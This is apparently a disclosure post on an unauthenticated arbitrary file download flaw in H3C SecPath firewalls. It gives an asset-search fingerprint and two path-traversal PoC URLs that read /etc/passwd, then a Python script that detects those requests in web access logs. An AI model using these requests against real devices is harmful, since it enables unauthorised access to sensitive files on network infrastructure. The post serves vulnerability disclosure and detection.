H3C SecPath next-generation firewall sys_dia_data_check arbitrary file download vulnerability
Vulnerability Description
The H3C SecPath next-generation firewall has function endpoints that are vulnerable to arbitrary file download; attackers can use the vulnerability to obtain sensitive information.
Vulnerability Impact
H3C SecPath
Network asset search fingerprint
title="Web user login"
Vulnerability Reproduction
The login page is as follows
Two functions are vulnerable
Click download, capture the packet, and change the request
Sensitive files can also be requested and downloaded without authentication. PoC for verification:
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd
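For detection, the two requests above can be searched for in web access logs. The following is an added example, not part of the original post or of any H3C code: it flags requests to the two handlers whose file parameter contains a `..` path segment. The combined-log line format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Handler name -> file parameter, both taken from the two PoC requests on this page.
HANDLERS = {"sys_dia_data_check": "file_name", "sys_capture_file_download": "name"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Normalise a value by undoing any remaining layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if any path segment is '..' once both slash styles are normalised."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def suspicious_requests(log_lines):
    """Return (line_number, handler, value) for traversal attempts on the two handlers."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.rstrip("/").endswith("/webui"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for handler in query.get("g", []):
            param = HANDLERS.get(handler)
            for value in query.get(param, []) if param else []:
                if is_traversal(value):
                    hits.append((number, handler, fully_decode(value)))
    return hits

# Constructed sample access-log lines (documentation addresses, assumed log format).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webui/?g=sys_dia_data_check&file_name=../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /webui/?g=sys_capture_file_download&name=capture_01.pcap HTTP/1.1" 200 88211',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /webui/?g=login HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, handler, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {handler} <- {value}")
```

A hit on either handler is worth reviewing together with the response status and size, since a successful download of a system file returns a 200 with a body.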
This post is licensed under CC BY 4.0 by the author.